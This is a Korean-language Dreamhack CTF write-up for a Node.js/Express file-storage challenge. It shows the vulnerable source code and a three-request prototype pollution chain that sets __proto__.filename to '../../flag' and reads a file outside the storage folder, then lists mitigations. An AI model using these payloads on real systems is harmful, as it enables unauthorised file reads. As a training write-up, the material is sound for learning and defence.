[Dreamhack] Level2: filestorage

🛎️ Access

파일을 관리할 수 있는 구현이 덜 된 홈페이지입니다.

 

 

👾 Exploit Algorithm & Payload

> app.js

const express=require('express');
const bodyParser=require('body-parser');
const ejs=require('ejs');
const hash=require('crypto-js/sha256');
const fs = require('fs');
const app=express();


var file={};
var read={};
function isObject(obj) {
  return obj !== null && typeof obj === 'object';
}
function setValue(obj, key, value) {
  const keylist = key.split('.');
  const e = keylist.shift();
  if (keylist.length > 0) {
    if (!isObject(obj[e])) obj[e] = {};
    setValue(obj[e], keylist.join('.'), value);
  } else {
    obj[key] = value;
    return obj;
  }
}

app.use(bodyParser.urlencoded({ extended: false }));
app.set('view engine','ejs');


app.get('/',function(req,resp){
	read['filename']='fake';
	resp.render(__dirname+"/ejs/index.ejs");

})

app.post('/mkfile',function(req,resp){
	let {filename,content}=req.body;
	filename=hash(filename).toString();
	fs.writeFile(__dirname+"/storage/"+filename,content,function(err){
		if(err==null){
			file[filename]=filename;
			resp.send('your file name is '+filename);
		}else{
			resp.write("<script>alert('error')</script>");
			resp.write("<script>window.location='/'</script>");
		}
	})

})

app.get('/readfile',function(req,resp){
	let filename=file[req.query.filename];
	if(filename==null){
		fs.readFile(__dirname+'/storage/'+read['filename'],'UTF-8',function(err,data){
			resp.send(data);
		})
	}else{
		read[filename]=filename.replaceAll('.','');
		fs.readFile(__dirname+'/storage/'+read[filename],'UTF-8',function(err,data){
			if(err==null){
				resp.send(data);
			}else{
				resp.send('file is not existed');
			}
		})
	}

})

app.get('/test',function(req,resp){
	let {func,filename,rename}=req.query;
	if(func==null){
		resp.send("this page hasn't been made yet");
	}else if(func=='rename'){
		setValue(file,filename,rename)
		resp.send('rename');
	}else if(func=='reset'){
		read={};
		resp.send("file reset");
	}
})


app.listen(8000);

> dokerfile

FROM node

RUN mkdir -p /app
RUN echo 'BISC{fake flag}' > /flag

WORKDIR /app

COPY ./ /app

RUN npm install

EXPOSE 8000

CMD ["npm","start"]

 

 

#1

---

: '/' 페이지에서 파일 이름과 내용을 입력하고 보낼 수 있는 곳을 확인할 수 있다.

 

app.get('/test',function(req,resp){
    let {func,filename,rename}=req.query;
    if(func==null){
        resp.send("this page hasn't been made yet");
    } else if(func=='rename'){
        setValue(file,filename,rename)
        resp.send('rename');
    } else if(func=='reset'){
        read={};
        resp.send("file reset");
}})

: '/test' 경로에 func, filename, rename이라는 파라미터명이 있음을 확인할 수 있다.

: '/test?func=rename' 과 '/test?func=reset'에 따라 다른 반응을 한다.

: '/test?func=rename&filename=[해당 파일명]&rename=[변경된 파일명]' 의 파라미터값을 이용하면 해당 파일의 이름을 변경된 파일의 이름으로 변경하게 된다.

: '/test?func=reset'의 경우는 read를 리셋하게 된다.

 

 

#2

---

app.get('/readfile',function(req,resp){
    ...
   read[filename]=filename.replaceAll('.','');
    ...
})

...

app.get('/test',function(req,resp){
    ....
    }else if(func=='rename'){
        setValue(file,filename,rename)
    ....
})

: 코드를 전체적으로 살피면 filedownload 취약점을 방어하기 위해서 replaceAll() 함수가 사용되어있다.

: 하지만 setValue() 함수에서 prototype pollution 취약점이 존재한다.

 

https://blog.coderifleman.com/2019/07/19/prototype-pollution-attacks-in-nodejs/

Node.js에서의 프로토타입 오염 공격이란 무엇인가

 

# prototype pollution 예시
const obj1 = {};
setValue(obj1, "__proto__.polluted", 1);
const obj2 = {};
console.log(obj2.polluted); // 1

: 다음 예시와 같이 Node.js에서 사용 가능한 __proto__는 Object.prototype과 같다는 것을 이용해 다른 객체 속성에 영향을 주는 방식이다.

 

: 추가로 Dockerfile을 확인하여 flag 파일이 내부 어딘가에 존재한다는 것을 알 수 있다.

 

 

#3

---

...
app.get('/readfile',function(req,resp){
    let filename=file[req.query.filename];
    if(filename==null){
        fs.readFile(__dirname+'/storage/'+read['filename'],'UTF-8',function(err,data){
            resp.send(data);        })
    }else{
        read[filename]=filename.replaceAll('.','');
        fs.readFile(__dirname+'/storage/'+read[filename],'UTF-8',function(err,data){
            if(err==null){
                resp.send(data);
            }else{
              resp.send('file is not existed');
            }
        })
    }
})
...

GET /test?func=rename&filename=__proto__.filename&rename=../../flag
-> rename

: filename의 파라미터를 이용해 read를 오염시킨다.

: filename과 rename 파라미터에 프로토타입 오염 공격 페이로드를 작성하면 전달된다.

 

GET /test?func=reset

: 그리고 read 객체를 초기화 해준다.

: 초기화를 해줘야하는 이유는 read 객체에 'filename'이라는 속성을 찾기 때문이다.(read['filename']) 이는 항상 'filename' 속성을 찾지만, read[filename]은 filename 변수의 값에 따라 read 객체에 다른 속성을 찾을 수 있다.

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

GET /readfile?filename=

: 그럼 다음과 같이 해당 위치의 flag를 획득할 수 있다.

 

 

📌Summary

---

 Node.js의 __proto__는 객체의 프로토타입을 참조하는 속성이다. 프로토타입 기반 상속에서 중요한 역할을 하나 이러한 속성이 악의적인 코드로 사용될 수 있다. 이를 prototype pollution이라 한다. 이는 악의적인 사용자가 프로토타입 체인을 조작하여 어플리케이션의 동작에 영향을 미치는 공격으로 원래 없던 속성을 추가하거나, 기존 속성을 변경 및 메서드를 오버라이드할 수 있게 된다.

 

-대응방안-

- 입력값 검증

: 여기서는 특히 __proto__ 와 관련된 문자나 prototype과 같은 키워드가 포함된 입력을 적절히 검증해야 함.

- Object.freeze() 활용

: 이 메서드를 사용하면 객체를 동결하여 그 속성을 변경할 수 없게 만들 수 있다.

- 외부 라이브러리 사용 주의

...